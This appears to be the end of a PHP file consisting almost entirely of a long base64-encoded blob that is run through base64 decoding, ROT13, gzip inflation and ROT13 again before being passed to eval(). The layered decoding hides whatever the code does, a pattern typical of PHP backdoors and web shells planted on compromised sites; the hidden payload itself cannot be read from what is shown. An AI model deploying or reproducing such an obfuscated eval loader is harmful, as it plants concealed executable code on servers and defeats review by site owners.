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";

eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));
?>